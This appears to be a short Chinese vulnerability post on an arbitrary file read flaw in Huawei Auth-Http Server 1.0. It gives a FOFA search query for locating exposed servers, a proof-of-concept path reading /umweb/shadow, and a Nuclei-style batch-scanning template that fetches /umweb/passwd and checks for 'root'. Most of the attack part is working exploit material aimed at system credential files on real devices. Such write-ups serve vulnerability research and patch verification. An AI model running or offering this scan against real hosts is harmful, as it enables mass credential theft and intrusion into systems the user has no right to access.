1.漏洞描述
华为Auth-Http Server 1.0任意文件读取,攻击者可通过该漏洞读取任意文件。
2.网络资产查找
FOFA:server="Huawei Auth-Http Server 1.0"
data:image/s3,"s3://crabby-images/b0eb5/b0eb520d4819b0507f4315b402272a0f6a91e574" alt=""
2、部分界面如下
data:image/s3,"s3://crabby-images/b1e61/b1e61f44c178d80b7f3e9791d88a4b1c15eab648" alt=""
3、Poc
/umweb/shadow
data:image/s3,"s3://crabby-images/3c2bb/3c2bb2c106ccc0d82ca928e95083c0f14dc37640" alt=""
4、Poc批量验证
python
id: huanwei-auth-http-server-fileread
info:
name: 华为Auth-Http Server 1.0任意文件读取
author:
severity: medium
description: 华为Auth-Http Server 1.0任意文件读取,攻击者可通过此漏洞获取敏感信息。
reference:
- https://
metadata:
fofa-query: server="Huawei Auth-Http Server 1.0"
verified: true
max-request: 1
http:
- raw:
- |
GET /umweb/passwd HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code==200 && contains_all(body,"root")'
data:image/s3,"s3://crabby-images/ad721/ad721b4f0a250fc3d783c0b4e17f03b08a74592a" alt=""